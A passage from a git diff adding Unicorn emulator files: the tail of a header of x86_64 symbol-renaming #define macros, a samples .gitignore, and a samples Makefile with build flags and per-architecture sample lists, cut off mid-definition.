stl_phys_internal_x86_64 +#define stl_phys_notdirty stl_phys_notdirty_x86_64 +#define store_cpu_offset store_cpu_offset_x86_64 +#define store_reg store_reg_x86_64 +#define store_reg_bx store_reg_bx_x86_64 +#define store_reg_from_load store_reg_from_load_x86_64 +#define stq_be_p stq_be_p_x86_64 +#define stq_be_phys stq_be_phys_x86_64 +#define stq_he_p stq_he_p_x86_64 +#define stq_le_p stq_le_p_x86_64 +#define stq_le_phys stq_le_phys_x86_64 +#define stq_phys stq_phys_x86_64 +#define 
string_input_get_visitor string_input_get_visitor_x86_64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_x86_64 +#define string_input_visitor_new string_input_visitor_new_x86_64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_x86_64 +#define strstart strstart_x86_64 +#define strtosz strtosz_x86_64 +#define strtosz_suffix strtosz_suffix_x86_64 +#define stw_be_p stw_be_p_x86_64 +#define stw_be_phys stw_be_phys_x86_64 +#define stw_he_p stw_he_p_x86_64 +#define stw_le_p stw_le_p_x86_64 +#define stw_le_phys stw_le_phys_x86_64 +#define stw_phys stw_phys_x86_64 +#define stw_phys_internal stw_phys_internal_x86_64 +#define sub128 sub128_x86_64 +#define sub16_sat sub16_sat_x86_64 +#define sub16_usat sub16_usat_x86_64 +#define sub192 sub192_x86_64 +#define sub8_sat sub8_sat_x86_64 +#define sub8_usat sub8_usat_x86_64 +#define subFloat128Sigs subFloat128Sigs_x86_64 +#define subFloat32Sigs subFloat32Sigs_x86_64 +#define subFloat64Sigs subFloat64Sigs_x86_64 +#define subFloatx80Sigs subFloatx80Sigs_x86_64 +#define subpage_accepts subpage_accepts_x86_64 +#define subpage_init subpage_init_x86_64 +#define subpage_ops subpage_ops_x86_64 +#define subpage_read subpage_read_x86_64 +#define subpage_register subpage_register_x86_64 +#define subpage_write subpage_write_x86_64 +#define suffix_mul suffix_mul_x86_64 +#define swap_commutative swap_commutative_x86_64 +#define swap_commutative2 swap_commutative2_x86_64 +#define switch_mode switch_mode_x86_64 +#define switch_v7m_sp switch_v7m_sp_x86_64 +#define syn_aa32_bkpt syn_aa32_bkpt_x86_64 +#define syn_aa32_hvc syn_aa32_hvc_x86_64 +#define syn_aa32_smc syn_aa32_smc_x86_64 +#define syn_aa32_svc syn_aa32_svc_x86_64 +#define syn_breakpoint syn_breakpoint_x86_64 +#define sync_globals sync_globals_x86_64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_x86_64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_x86_64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_x86_64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_x86_64 +#define 
syn_data_abort syn_data_abort_x86_64 +#define syn_fp_access_trap syn_fp_access_trap_x86_64 +#define syn_insn_abort syn_insn_abort_x86_64 +#define syn_swstep syn_swstep_x86_64 +#define syn_uncategorized syn_uncategorized_x86_64 +#define syn_watchpoint syn_watchpoint_x86_64 +#define syscall_err syscall_err_x86_64 +#define system_bus_class_init system_bus_class_init_x86_64 +#define system_bus_info system_bus_info_x86_64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_x86_64 +#define table_logic_cc table_logic_cc_x86_64 +#define target_parse_constraint target_parse_constraint_x86_64 +#define target_words_bigendian target_words_bigendian_x86_64 +#define tb_add_jump tb_add_jump_x86_64 +#define tb_alloc tb_alloc_x86_64 +#define tb_alloc_page tb_alloc_page_x86_64 +#define tb_check_watchpoint tb_check_watchpoint_x86_64 +#define tb_find_fast tb_find_fast_x86_64 +#define tb_find_pc tb_find_pc_x86_64 +#define tb_find_slow tb_find_slow_x86_64 +#define tb_flush tb_flush_x86_64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_x86_64 +#define tb_free tb_free_x86_64 +#define tb_gen_code tb_gen_code_x86_64 +#define tb_hash_remove tb_hash_remove_x86_64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_x86_64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_x86_64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_x86_64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_x86_64 +#define tb_jmp_remove tb_jmp_remove_x86_64 +#define tb_link_page tb_link_page_x86_64 +#define tb_page_remove tb_page_remove_x86_64 +#define tb_phys_hash_func tb_phys_hash_func_x86_64 +#define tb_phys_invalidate tb_phys_invalidate_x86_64 +#define tb_reset_jump tb_reset_jump_x86_64 +#define tb_set_jmp_target tb_set_jmp_target_x86_64 +#define tcg_accel_class_init tcg_accel_class_init_x86_64 +#define tcg_accel_type tcg_accel_type_x86_64 +#define tcg_add_param_i32 tcg_add_param_i32_x86_64 +#define tcg_add_param_i64 
tcg_add_param_i64_x86_64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_x86_64 +#define tcg_allowed tcg_allowed_x86_64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_x86_64 +#define tcg_commit tcg_commit_x86_64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_x86_64 +#define tcg_constant_folding tcg_constant_folding_x86_64 +#define tcg_const_i32 tcg_const_i32_x86_64 +#define tcg_const_i64 tcg_const_i64_x86_64 +#define tcg_const_local_i32 tcg_const_local_i32_x86_64 +#define tcg_const_local_i64 tcg_const_local_i64_x86_64 +#define tcg_context_init tcg_context_init_x86_64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_x86_64 +#define tcg_cpu_exec tcg_cpu_exec_x86_64 +#define tcg_current_code_size tcg_current_code_size_x86_64 +#define tcg_dump_info tcg_dump_info_x86_64 +#define tcg_dump_ops tcg_dump_ops_x86_64 +#define tcg_exec_all tcg_exec_all_x86_64 +#define tcg_find_helper tcg_find_helper_x86_64 +#define tcg_func_start tcg_func_start_x86_64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_x86_64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_x86_64 +#define tcg_gen_add_i32 tcg_gen_add_i32_x86_64 +#define tcg_gen_add_i64 tcg_gen_add_i64_x86_64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_x86_64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_x86_64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_x86_64 +#define tcg_gen_and_i32 tcg_gen_and_i32_x86_64 +#define tcg_gen_and_i64 tcg_gen_and_i64_x86_64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_x86_64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_x86_64 +#define tcg_gen_br tcg_gen_br_x86_64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_x86_64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_x86_64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_x86_64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_x86_64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_x86_64 +#define tcg_gen_callN tcg_gen_callN_x86_64 +#define tcg_gen_code tcg_gen_code_x86_64 +#define tcg_gen_code_common tcg_gen_code_common_x86_64 +#define 
tcg_gen_code_search_pc tcg_gen_code_search_pc_x86_64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_x86_64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_x86_64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_x86_64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_x86_64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_x86_64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_x86_64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_x86_64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_x86_64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_x86_64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_x86_64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_x86_64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_x86_64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_x86_64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_x86_64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_x86_64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_x86_64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_x86_64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_x86_64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_x86_64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_x86_64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_x86_64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_x86_64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_x86_64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_x86_64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_x86_64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_x86_64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_x86_64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_x86_64 +#define tcg_gen_not_i32 tcg_gen_not_i32_x86_64 +#define tcg_gen_op0 tcg_gen_op0_x86_64 +#define tcg_gen_op1i tcg_gen_op1i_x86_64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_x86_64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_x86_64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_x86_64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_x86_64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_x86_64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_x86_64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_x86_64 
+#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_x86_64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_x86_64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_x86_64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_x86_64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_x86_64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_x86_64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_x86_64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_x86_64 +#define tcg_gen_or_i32 tcg_gen_or_i32_x86_64 +#define tcg_gen_or_i64 tcg_gen_or_i64_x86_64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_x86_64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_x86_64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_x86_64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_x86_64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_x86_64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_x86_64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_x86_64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_x86_64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_x86_64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_x86_64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_x86_64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_x86_64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_x86_64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_x86_64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_x86_64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_x86_64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_x86_64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_x86_64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_x86_64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_x86_64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_x86_64 +#define tcg_gen_st_i32 tcg_gen_st_i32_x86_64 +#define tcg_gen_st_i64 tcg_gen_st_i64_x86_64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_x86_64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_x86_64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_x86_64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_x86_64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_x86_64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_x86_64 +#define 
tcg_gen_xor_i64 tcg_gen_xor_i64_x86_64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_x86_64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_x86_64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_x86_64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_x86_64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_x86_64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_x86_64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_x86_64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_x86_64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_x86_64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_x86_64 +#define tcg_handle_interrupt tcg_handle_interrupt_x86_64 +#define tcg_init tcg_init_x86_64 +#define tcg_invert_cond tcg_invert_cond_x86_64 +#define tcg_la_bb_end tcg_la_bb_end_x86_64 +#define tcg_la_br_end tcg_la_br_end_x86_64 +#define tcg_la_func_end tcg_la_func_end_x86_64 +#define tcg_liveness_analysis tcg_liveness_analysis_x86_64 +#define tcg_malloc tcg_malloc_x86_64 +#define tcg_malloc_internal tcg_malloc_internal_x86_64 +#define tcg_op_defs_org tcg_op_defs_org_x86_64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_x86_64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_x86_64 +#define tcg_optimize tcg_optimize_x86_64 +#define tcg_out16 tcg_out16_x86_64 +#define tcg_out32 tcg_out32_x86_64 +#define tcg_out64 tcg_out64_x86_64 +#define tcg_out8 tcg_out8_x86_64 +#define tcg_out_addi tcg_out_addi_x86_64 +#define tcg_out_branch tcg_out_branch_x86_64 +#define tcg_out_brcond32 tcg_out_brcond32_x86_64 +#define tcg_out_brcond64 tcg_out_brcond64_x86_64 +#define tcg_out_bswap32 tcg_out_bswap32_x86_64 +#define tcg_out_bswap64 tcg_out_bswap64_x86_64 +#define tcg_out_call tcg_out_call_x86_64 +#define tcg_out_cmp tcg_out_cmp_x86_64 +#define tcg_out_ext16s tcg_out_ext16s_x86_64 +#define tcg_out_ext16u tcg_out_ext16u_x86_64 +#define tcg_out_ext32s tcg_out_ext32s_x86_64 +#define tcg_out_ext32u tcg_out_ext32u_x86_64 +#define tcg_out_ext8s 
tcg_out_ext8s_x86_64 +#define tcg_out_ext8u tcg_out_ext8u_x86_64 +#define tcg_out_jmp tcg_out_jmp_x86_64 +#define tcg_out_jxx tcg_out_jxx_x86_64 +#define tcg_out_label tcg_out_label_x86_64 +#define tcg_out_ld tcg_out_ld_x86_64 +#define tcg_out_modrm tcg_out_modrm_x86_64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_x86_64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_x86_64 +#define tcg_out_mov tcg_out_mov_x86_64 +#define tcg_out_movcond32 tcg_out_movcond32_x86_64 +#define tcg_out_movcond64 tcg_out_movcond64_x86_64 +#define tcg_out_movi tcg_out_movi_x86_64 +#define tcg_out_op tcg_out_op_x86_64 +#define tcg_out_pop tcg_out_pop_x86_64 +#define tcg_out_push tcg_out_push_x86_64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_x86_64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_x86_64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_x86_64 +#define tcg_out_qemu_st tcg_out_qemu_st_x86_64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_x86_64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_x86_64 +#define tcg_out_reloc tcg_out_reloc_x86_64 +#define tcg_out_rolw_8 tcg_out_rolw_8_x86_64 +#define tcg_out_setcond32 tcg_out_setcond32_x86_64 +#define tcg_out_setcond64 tcg_out_setcond64_x86_64 +#define tcg_out_shifti tcg_out_shifti_x86_64 +#define tcg_out_st tcg_out_st_x86_64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_x86_64 +#define tcg_out_tb_init tcg_out_tb_init_x86_64 +#define tcg_out_tlb_load tcg_out_tlb_load_x86_64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_x86_64 +#define tcg_patch32 tcg_patch32_x86_64 +#define tcg_patch8 tcg_patch8_x86_64 +#define tcg_pcrel_diff tcg_pcrel_diff_x86_64 +#define tcg_pool_reset tcg_pool_reset_x86_64 +#define tcg_prologue_init tcg_prologue_init_x86_64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_x86_64 +#define tcg_reg_alloc tcg_reg_alloc_x86_64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_x86_64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_x86_64 +#define tcg_reg_alloc_mov 
tcg_reg_alloc_mov_x86_64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_x86_64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_x86_64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_x86_64 +#define tcg_reg_free tcg_reg_free_x86_64 +#define tcg_reg_sync tcg_reg_sync_x86_64 +#define tcg_set_frame tcg_set_frame_x86_64 +#define tcg_set_nop tcg_set_nop_x86_64 +#define tcg_swap_cond tcg_swap_cond_x86_64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_x86_64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_x86_64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_x86_64 +#define tcg_target_const_match tcg_target_const_match_x86_64 +#define tcg_target_init tcg_target_init_x86_64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_x86_64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_x86_64 +#define tcg_temp_alloc tcg_temp_alloc_x86_64 +#define tcg_temp_free_i32 tcg_temp_free_i32_x86_64 +#define tcg_temp_free_i64 tcg_temp_free_i64_x86_64 +#define tcg_temp_free_internal tcg_temp_free_internal_x86_64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_x86_64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_x86_64 +#define tcg_temp_new_i32 tcg_temp_new_i32_x86_64 +#define tcg_temp_new_i64 tcg_temp_new_i64_x86_64 +#define tcg_temp_new_internal tcg_temp_new_internal_x86_64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_x86_64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_x86_64 +#define tdb_hash tdb_hash_x86_64 +#define teecr_write teecr_write_x86_64 +#define teehbr_access teehbr_access_x86_64 +#define temp_allocate_frame temp_allocate_frame_x86_64 +#define temp_dead temp_dead_x86_64 +#define temps_are_copies temps_are_copies_x86_64 +#define temp_save temp_save_x86_64 +#define temp_sync temp_sync_x86_64 +#define tgen_arithi tgen_arithi_x86_64 +#define tgen_arithr tgen_arithr_x86_64 +#define thumb2_logic_op thumb2_logic_op_x86_64 +#define ti925t_initfn ti925t_initfn_x86_64 +#define 
tlb_add_large_page tlb_add_large_page_x86_64 +#define tlb_flush_entry tlb_flush_entry_x86_64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_x86_64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_x86_64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_x86_64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_x86_64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_x86_64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_x86_64 +#define tlbiall_is_write tlbiall_is_write_x86_64 +#define tlbiall_write tlbiall_write_x86_64 +#define tlbiasid_is_write tlbiasid_is_write_x86_64 +#define tlbiasid_write tlbiasid_write_x86_64 +#define tlbimvaa_is_write tlbimvaa_is_write_x86_64 +#define tlbimvaa_write tlbimvaa_write_x86_64 +#define tlbimva_is_write tlbimva_is_write_x86_64 +#define tlbimva_write tlbimva_write_x86_64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_x86_64 +#define tlb_protect_code tlb_protect_code_x86_64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_x86_64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_x86_64 +#define tlb_set_dirty tlb_set_dirty_x86_64 +#define tlb_set_dirty1 tlb_set_dirty1_x86_64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_x86_64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_x86_64 +#define token_get_type token_get_type_x86_64 +#define token_get_value token_get_value_x86_64 +#define token_is_escape token_is_escape_x86_64 +#define token_is_keyword token_is_keyword_x86_64 +#define token_is_operator token_is_operator_x86_64 +#define tokens_append_from_iter tokens_append_from_iter_x86_64 +#define to_qiv to_qiv_x86_64 +#define to_qov to_qov_x86_64 +#define tosa_init tosa_init_x86_64 +#define tosa_machine_init tosa_machine_init_x86_64 +#define tswap32 tswap32_x86_64 +#define tswap64 tswap64_x86_64 +#define type_class_get_size type_class_get_size_x86_64 +#define type_get_by_name type_get_by_name_x86_64 +#define type_get_parent type_get_parent_x86_64 +#define type_has_parent type_has_parent_x86_64 +#define 
type_initialize type_initialize_x86_64 +#define type_initialize_interface type_initialize_interface_x86_64 +#define type_is_ancestor type_is_ancestor_x86_64 +#define type_new type_new_x86_64 +#define type_object_get_size type_object_get_size_x86_64 +#define type_register_internal type_register_internal_x86_64 +#define type_table_add type_table_add_x86_64 +#define type_table_get type_table_get_x86_64 +#define type_table_lookup type_table_lookup_x86_64 +#define uint16_to_float32 uint16_to_float32_x86_64 +#define uint16_to_float64 uint16_to_float64_x86_64 +#define uint32_to_float32 uint32_to_float32_x86_64 +#define uint32_to_float64 uint32_to_float64_x86_64 +#define uint64_to_float128 uint64_to_float128_x86_64 +#define uint64_to_float32 uint64_to_float32_x86_64 +#define uint64_to_float64 uint64_to_float64_x86_64 +#define unassigned_io_ops unassigned_io_ops_x86_64 +#define unassigned_io_read unassigned_io_read_x86_64 +#define unassigned_io_write unassigned_io_write_x86_64 +#define unassigned_mem_accepts unassigned_mem_accepts_x86_64 +#define unassigned_mem_ops unassigned_mem_ops_x86_64 +#define unassigned_mem_read unassigned_mem_read_x86_64 +#define unassigned_mem_write unassigned_mem_write_x86_64 +#define update_spsel update_spsel_x86_64 +#define v6_cp_reginfo v6_cp_reginfo_x86_64 +#define v6k_cp_reginfo v6k_cp_reginfo_x86_64 +#define v7_cp_reginfo v7_cp_reginfo_x86_64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_x86_64 +#define v7m_pop v7m_pop_x86_64 +#define v7m_push v7m_push_x86_64 +#define v8_cp_reginfo v8_cp_reginfo_x86_64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_x86_64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_x86_64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_x86_64 +#define vapa_cp_reginfo vapa_cp_reginfo_x86_64 +#define vbar_write vbar_write_x86_64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_x86_64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_x86_64 +#define vfp_get_fpcr vfp_get_fpcr_x86_64 +#define vfp_get_fpscr 
vfp_get_fpscr_x86_64 +#define vfp_get_fpsr vfp_get_fpsr_x86_64 +#define vfp_reg_offset vfp_reg_offset_x86_64 +#define vfp_set_fpcr vfp_set_fpcr_x86_64 +#define vfp_set_fpscr vfp_set_fpscr_x86_64 +#define vfp_set_fpsr vfp_set_fpsr_x86_64 +#define visit_end_implicit_struct visit_end_implicit_struct_x86_64 +#define visit_end_list visit_end_list_x86_64 +#define visit_end_struct visit_end_struct_x86_64 +#define visit_end_union visit_end_union_x86_64 +#define visit_get_next_type visit_get_next_type_x86_64 +#define visit_next_list visit_next_list_x86_64 +#define visit_optional visit_optional_x86_64 +#define visit_start_implicit_struct visit_start_implicit_struct_x86_64 +#define visit_start_list visit_start_list_x86_64 +#define visit_start_struct visit_start_struct_x86_64 +#define visit_start_union visit_start_union_x86_64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_x86_64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_x86_64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_x86_64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_x86_64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_x86_64 +#define vmsa_ttbr_write vmsa_ttbr_write_x86_64 +#define write_cpustate_to_list write_cpustate_to_list_x86_64 +#define write_list_to_cpustate write_list_to_cpustate_x86_64 +#define write_raw_cp_reg write_raw_cp_reg_x86_64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_x86_64 +#define x86_op_defs x86_op_defs_x86_64 +#define xpsr_read xpsr_read_x86_64 +#define xpsr_write xpsr_write_x86_64 +#define xscale_cpar_write xscale_cpar_write_x86_64 +#define xscale_cp_reginfo xscale_cp_reginfo_x86_64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore b/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore new file mode 100644 index 0000000..f53a0ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore @@ -0,0 +1,5 @@ +!*.c +sample_* +shellcode* +mem_apis* + diff --git a/ai_anti_malware/unicorn/unicorn-master/samples/Makefile 
b/ai_anti_malware/unicorn/unicorn-master/samples/Makefile new file mode 100644 index 0000000..5b4b28d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/samples/Makefile @@ -0,0 +1,155 @@ +# Unicorn Engine +# By Nguyen Anh Quynh , 2015 + +include ../config.mk + +UNAME_S := $(shell uname -s) + +LIBDIR = .. +BIN_EXT = +AR_EXT = a + +# Verbose output? +V ?= 0 + +CFLAGS += -Wall -Werror -I../include + +LDFLAGS += -L$(LIBDIR) -lunicorn -lpthread -lm +ifeq ($(UNAME_S), Linux) +LDFLAGS += -lrt +endif + +LDLIBS += -lpthread -lunicorn -lm + +ifneq ($(CROSS),) +CC = $(CROSS)gcc +endif + +ifeq ($(UNICORN_ASAN),yes) +CC = clang +CXX = clang++ +AR = llvm-ar +CFLAGS += -fsanitize=address -fno-omit-frame-pointer +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +# Cygwin? +ifneq ($(filter CYGWIN%,$(UNAME_S)),) +CFLAGS := $(CFLAGS:-fPIC=) +LDLIBS += -lssp +BIN_EXT = .exe +AR_EXT = a +# mingw? +else ifneq ($(filter MINGW%,$(UNAME_S)),) +CFLAGS := $(CFLAGS:-fPIC=) +BIN_EXT = .exe +AR_EXT = a +endif + +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +ARCHIVE = $(LIBDIR)/unicorn.$(AR_EXT) +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) +else +ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) +endif +endif + +.PHONY: all clean + +UNICORN_ARCHS := $(shell if [ -e ../config.log ]; then cat ../config.log;\ + else printf "$(UNICORN_ARCHS)"; fi) + +SOURCES = +ifneq (,$(findstring arm,$(UNICORN_ARCHS))) +SOURCES += sample_arm.c +SOURCES += sample_armeb.c +endif +ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) +SOURCES += sample_arm64.c +SOURCES += sample_arm64eb.c +endif +ifneq (,$(findstring mips,$(UNICORN_ARCHS))) +SOURCES += sample_mips.c +endif +#ifneq (,$(findstring ppc,$(UNICORN_ARCHS))) +#SOURCES += sample_ppc.c +#endif +ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) +SOURCES += sample_sparc.c +endif +ifneq (,$(findstring x86,$(UNICORN_ARCHS))) +SOURCES += sample_x86.c +SOURCES += shellcode.c +SOURCES += mem_apis.c +SOURCES += 
sample_x86_32_gdt_and_seg_regs.c +SOURCES += sample_batch_reg.c +endif +ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) +SOURCES += sample_m68k.c +endif + +BINS = $(SOURCES:.c=$(BIN_EXT)) +OBJS = $(SOURCES:.c=.o) + +all: $(BINS) + +$(BINS): $(OBJS) + +clean: + rm -rf *.o $(BINS) + +%$(BIN_EXT): %.o + @mkdir -p $(@D) +ifeq ($(V),0) +ifeq ($(UNICORN_SHARED),yes) + $(call log,LINK,$(notdir $@)) + @$(link-dynamic) +endif +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) + $(call log,LINK,$(notdir $(call staticname,$@))) + @$(link-static) +endif +endif +else +ifeq ($(UNICORN_SHARED),yes) + $(link-dynamic) +endif +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) + $(link-static) +endif +endif +endif + +%.o: %.c + @mkdir -p $(@D) +ifeq ($(V),0) + $(call log,CC,$(@:%=%)) + @$(compile) +else + $(compile) +endif + + +define link-dynamic + $(CC) $< ${CFLAGS} $(LDFLAGS) -o $@ +endef + + +define link-static + 